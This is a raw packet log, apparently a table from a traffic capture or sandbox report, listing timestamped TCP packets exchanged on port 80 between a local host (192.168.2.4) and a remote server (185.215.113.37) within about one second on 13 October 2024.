Oct 13, 2024 17:46:11.289938927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289951086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.289953947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.289953947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.290030003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.290030003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.290582895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290595055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290611029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290646076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.290648937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290662050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290672064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290683031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290687084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.290736914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.290736914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.290745020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290756941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290767908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290777922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290788889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290800095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.290831089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.290831089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.290883064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.291505098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.291517019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.291528940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.291574955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.291577101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.291587114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.291623116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.291668892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.373363972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.373383999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.373394966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.373406887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.373416901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.373429060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.373429060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.373472929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.373472929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.407679081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407701015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407712936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407742977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.407752037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407782078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407793045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407804012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407823086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.407823086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.407834053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407855034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407866955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.407876015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407906055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.407907009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.407911062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407923937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.407933950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407954931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407960892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.407970905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407982111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.407987118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.407994986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408025980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408025980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408039093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408050060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408060074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408071041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408081055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408083916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408092976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408104897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408118010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408128977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408138990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408140898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408140898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408150911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408162117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408173084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408181906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408181906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408216953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408217907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408659935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408672094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408683062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408708096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408716917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408716917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408718109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408729076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408740044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408751011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408797026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408797026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408879042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408966064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408977032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.408977985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.408988953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409004927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409006119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409015894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409027100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409038067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409048080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409060955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409060955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409090996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409090996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409240961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409252882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409264088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409281969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409313917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409324884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409334898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409346104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409353971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409353971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409488916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409499884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409517050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409527063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409528017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409528017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409544945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409555912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409565926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409575939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409583092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409583092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409589052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409596920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409600973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409610987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409626961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.409632921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409661055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.409828901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413120031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413139105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413150072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413187981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413233995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413244963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413255930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413266897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413276911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413288116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413321972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413321972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413367033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413388014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413398981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413408041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413419008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413429976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413439989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413441896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413441896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413451910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413461924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413475990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413490057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413542986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413602114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413672924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413682938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413693905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413717985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413717985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413729906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413739920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413741112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413752079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413790941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413790941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413810015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413810015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413821936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413867950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413868904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413913012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413927078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413984060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.413986921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.413999081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.414016008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.414026976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.414036989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.414064884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.414067984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.414067984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.414077044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.414094925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.414105892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.414113998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.414113998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.414118052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.414129972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.414134979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.414140940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.414184093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.414185047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.464013100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.464027882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.464037895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.464080095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.464106083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.464118958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.464129925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.464190960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.464190960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.464190960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.497971058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.497984886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498055935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498127937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498145103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498156071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498166084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498177052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498188019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498198986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498209953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498214006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498214006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498220921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498234034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498250008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498266935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498277903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498277903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498279095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498290062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498301029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498317003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498327971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498338938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498344898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498344898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498357058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498367071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498378038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498387098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498390913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498390913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498399019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498410940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498420954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498430967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498441935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498452902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498467922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498467922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498480082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498491049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498501062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498509884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498509884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498511076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498564005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498578072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498589993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498605967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498615980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498626947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498627901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498627901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498637915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498648882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498677969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498687983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498687983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498727083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498727083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498765945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498776913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498786926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498807907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498817921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498826981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498836994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498836994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498846054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498858929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498899937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498899937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.498922110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498931885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.498991013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499001026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499011040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499017954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499022007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499033928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499053955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499053955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499100924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499123096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499193907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499257088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499269009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499279976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499291897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499303102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499342918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499342918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499346018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499358892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499368906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499392033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499404907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499413013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499414921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499427080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499429941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499438047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499440908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499450922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499463081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499473095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:11.499492884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499492884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:11.499598026 CEST	49730	80	192.168.2.4	185.215.113.37
